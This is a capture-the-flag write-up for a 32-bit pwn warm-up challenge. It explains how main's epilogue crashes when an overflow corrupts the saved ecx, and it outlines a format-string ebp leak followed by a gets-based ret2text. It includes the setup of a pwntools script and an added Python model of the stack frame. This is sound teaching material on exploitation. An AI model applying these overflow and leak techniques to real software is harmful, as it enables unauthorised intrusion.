I solved pwn1 and pwn3; pwn2 I couldn't get (I'm useless)...
pwn1
A sign-in (warm-up) challenge, but there is one thing to keep in mind:

```
.text:080485F8 mov eax, 0
.text:080485FD mov ecx, [ebp+var_4]
.text:08048600 leave
.text:08048601 lea esp, [ecx-4]
.text:08048604 retn
```

At the end of a 32-bit main there is this epilogue that rebuilds esp from the frame (via the saved ecx at [ebp+var_4]). If your stack overflow corrupts ebp, the `lea esp, [ecx-4]` / `retn` sequence reads a bogus address and the program faults instead of returning.
So the approach is simple: use the format string vulnerability to leak ebp, then use gets to do ret2text.
```python
# -*- coding: utf-8 -*-
from pwn import *
from LibcSearcher import *

context.log_level = 'debug'
# The challenge binary is 32-bit (see the epilogue above), so the
# architecture must be i386, not amd64, or p32()/p64() helpers and
# shellcode generation will target the wrong ABI.
context.arch = 'i386'
elf = ELF('qiandao')
p = 0


def pwn(ip, port, debug):
    """Open the target: a local process when debug == 1, else a remote socket."""
    global p
    if debug == 1:
        p = process('./qiandao')
    else:
        p = remote(ip, port)
```
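To make the crash mechanism concrete, here is a small model of that 32-bit gcc main() epilogue. It is an added example written for this writeup, not code from the challenge or from the author's script: the memory layout, addresses and return address are all constructed, and it reproduces the prologue/epilogue sequence (`lea ecx,[esp+4]; and esp,-16; push [ecx-4]; push ebp; mov ebp,esp; push ecx` on entry, `mov ecx,[ebp-4]; leave; lea esp,[ecx-4]; retn` on exit) to show why an overflow that reaches the saved-ecx slot breaks the return, and why knowing the frame address (the leaked ebp) is what makes it possible to keep that slot consistent.

```python
# Added example (not from the writeup): model of the 32-bit gcc main()
# epilogue `mov ecx,[ebp-4]; leave; lea esp,[ecx-4]; retn`.
# All addresses and memory contents below are constructed for the demo.
import struct

WORD = 4
MASK = 0xFFFFFFFF


def build_frame(ret_addr=0x08048500, caller_esp=0xFFFFD01C, buf_size=0x20):
    """Lay out the frame the way gcc's realigned main() prologue does:
         lea ecx,[esp+4]; and esp,-16; push [ecx-4]; push ebp;
         mov ebp,esp; push ecx; sub esp,N
    Returns (memory, ebp, address_of_local_buffer)."""
    mem = {}
    mem[caller_esp] = ret_addr          # return address pushed by `call main`
    ecx = caller_esp + WORD             # lea ecx,[esp+4]
    esp = caller_esp & ~0xF             # and esp,-16
    esp -= WORD
    mem[esp] = ret_addr                 # push [ecx-4]  (copy of return address)
    esp -= WORD
    mem[esp] = 0xFFFFD040               # push ebp      (constructed caller ebp)
    ebp = esp                           # mov ebp,esp
    esp -= WORD
    mem[esp] = ecx                      # push ecx      -> saved ecx at [ebp-4]
    esp -= buf_size                     # sub esp,N     -> local buffer
    return mem, ebp, esp


def write_bytes(mem, addr, data):
    """Model gets(): copy data upward from addr, word by word, with no bound."""
    padded = data + b"\x00" * (-len(data) % WORD)
    for i in range(0, len(padded), WORD):
        mem[addr + i] = struct.unpack("<I", padded[i:i + WORD])[0]


def run_epilogue(mem, ebp):
    """Execute: mov ecx,[ebp-4]; leave; lea esp,[ecx-4]; retn.
    Returns (eip, esp); eip is None when retn reads an unmapped address."""
    ecx = mem[ebp - WORD]               # mov ecx,[ebp-4]
    esp = ebp                           # leave: mov esp,ebp
    _caller_ebp = mem[esp]              #        pop ebp
    esp += WORD
    esp = (ecx - WORD) & MASK           # lea esp,[ecx-4]
    eip = mem.get(esp)                  # retn pops the return address
    return eip, (esp + WORD) & MASK


def intact():
    """Input that fits the buffer: the saved ecx survives, main returns normally."""
    mem, ebp, buf = build_frame()
    write_bytes(mem, buf, b"A" * 0x20)
    return run_epilogue(mem, ebp)       # -> (0x08048500, 0xFFFFD020)


def clobbered():
    """Four bytes too many: saved ecx becomes 0x41414141 and esp is garbage."""
    mem, ebp, buf = build_frame()
    write_bytes(mem, buf, b"A" * 0x24)
    return run_epilogue(mem, ebp)       # -> (None, 0x41414141): the '[ecx-4]' fault


def repaired(leaked_ebp):
    """With the frame address known, the saved-ecx slot can be rewritten with a
    value consistent with this layout (original ecx == ebp + 0x18 here), so
    the epilogue still lands on the mapped return address."""
    mem, ebp, buf = build_frame()
    assert leaked_ebp == ebp            # the leak must match the real frame
    write_bytes(mem, buf, b"A" * 0x20 + struct.pack("<I", leaked_ebp + 0x18))
    return run_epilogue(mem, ebp)       # -> (0x08048500, 0xFFFFD020)


if __name__ == "__main__":
    print("intact   :", tuple(hex(v) if v is not None else None for v in intact()))
    print("clobbered:", tuple(hex(v) if v is not None else None for v in clobbered()))
    print("repaired :", tuple(hex(v) if v is not None else None for v in repaired(0xFFFFD008)))
```

The `0x18` offset in `repaired()` is specific to this constructed layout; in a real binary the distance between the buffer, the saved-ecx slot and the original stack pointer is read off the disassembly, which is exactly why the writeup needs the ebp leak before anything written through gets can survive the epilogue.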